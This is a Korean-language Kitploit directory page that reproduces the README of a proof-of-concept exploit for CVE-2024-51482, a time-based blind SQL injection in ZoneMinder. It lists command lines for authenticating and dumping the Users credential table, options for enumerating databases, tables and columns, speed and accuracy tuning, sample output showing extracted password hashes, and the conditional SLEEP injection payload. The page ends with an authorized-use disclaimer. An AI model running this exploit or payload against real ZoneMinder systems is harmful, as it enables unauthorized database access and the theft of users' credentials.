Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-51482-PoC — ZoneMinder CVE-2024-51482에 대한 인증된 시간 기반 블라인드 SQL 인젝션 PoC (v1.37.* <= 1.37.64) | Kitploit
도구/GitHubGitHub/plur1bu5/cve-2024-51482-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

ZoneMinder CVE-2024-51482에 대한 인증된 시간 기반 블라인드 SQL 인젝션 PoC (v1.37.* <= 1.37.64)

저장소 보기
145개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-51482-PoC

*ZoneMinder v1.37. <= 1.37.64**에 대한 인증 기반 시간 기반 블라인드 SQL 인젝션 익스플로잇

개요

이것은 ZoneMinder의 이벤트 관리 기능에 존재하는 시간 기반 블라인드 SQL 인젝션 취약점인 CVE-2024-51482에 대한 개념 증명 익스플로잇입니다. 이 익스플로잇은 인증이 필요하며 조건부 SLEEP 쿼리를 사용하여 데이터베이스에서 데이터를 추출합니다.

기능

  • 인증 기반 익스플로잇 - 자격 증명 또는 세션 쿠키로 로그인
  • 길이 감지 - 추출 전에 이진 탐색으로 정확한 문자열 길이 확인
  • 병렬 추출 - 속도 향상을 위한 멀티스레드 문자 추출
  • sqlmap 스타일 옵션 - 데이터베이스, 테이블, 열을 열거하고 데이터 덤프
  • 안전한 기본값 - 높은 정확도를 위한 3초 지연, 5개 스레드
  • 진행 상황 추적 - 상세 모드에서 실시간 추출 진행 상황 표시
  • 깔끔한 출력 - 덤프된 데이터를 서식 있는 테이블로 표시

요구 사항

root@kitploit:~
pip install requests

빠른 시작

기본 모드 - 자격 증명 덤프

root@kitploit:~
python3 poc.py -t example.local -u admin -p password

세션 쿠키 사용

root@kitploit:~
python3 poc.py -t example.local --cookie 'ZMSESSID_value'

상세(Verbose) 모드

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -v

사용법

데이터베이스 열거

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --dbs

테이블 열거

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm --tables

열 열거

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

특정 테이블 덤프

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

옵션

root@kitploit:~
Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

성능 튜닝

안전 모드 (권장)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • 속도: 암호 해시당 약 2~3분
  • 정확도: 높음

빠른 모드 (오류 가능성 있음)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • 속도: 암호 해시당 약 30~60초
  • 정확도: 잘못된 문자가 생성될 수 있음

출력 예시

root@kitploit:~
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

작동 원리

  1. 인증 - 자격 증명으로 로그인하거나 제공된 세션 쿠키 사용
  2. 취약점 테스트 - 간단한 SLEEP 페이로드로 대상이 취약한지 확인
  3. 길이 감지 - 이진 탐색을 사용하여 정확한 문자열 길이 확인
  4. 병렬 추출 - 모든 문자 위치를 동시에 추출
  5. 데이터 표시 - 결과를 깔끔한 테이블로 포맷

페이로드 형식

이 익스플로잇은 조건부 SLEEP을 사용합니다:

root@kitploit:~
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • TRUE 조건: 지연 없음 (0초)
  • FALSE 조건: 전체 지연 (3초)

문제 해결

부정확한 결과

잘못된 문자가 생성되는 경우 (예: $가 8로 표시되는 경우):

root@kitploit:~
# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

너무 느린 경우

추출이 너무 느린 경우:

root@kitploit:~
# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

데이터가 없는 경우

기본 zm.Users 테이블이 존재하지 않는 경우:

root@kitploit:~
# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

CVE 정보

  • CVE ID: CVE-2024-51482
  • 영향받는 버전: ZoneMinder v1.37.* <= 1.37.64
  • 수정 버전: v1.37.65
  • 취약점 유형: 시간 기반 블라인드 SQL 인젝션
  • CVSS 점수: TBD

면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다.

  • 소유하고 있거나 테스트할 명시적 권한이 없는 시스템에 이 도구를 사용하지 마십시오
  • 컴퓨터 시스템에 대한 무단 접근은 불법입니다
  • 작성자는 이 도구로 인한 오용 또는 손해에 대해 책임을 지지 않습니다
  • 보안 평가를 수행하기 전에 항상 적절한 승인을 받으십시오

참고 자료

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub 저장소

라이선스

이 프로젝트는 교육 목적으로만 제공됩니다. 책임감 있고 윤리적으로 사용하십시오.


⭐ 유용하다고 생각되시면 저장소에 스타(Star)를 눌러 주세요!

도구 다운로드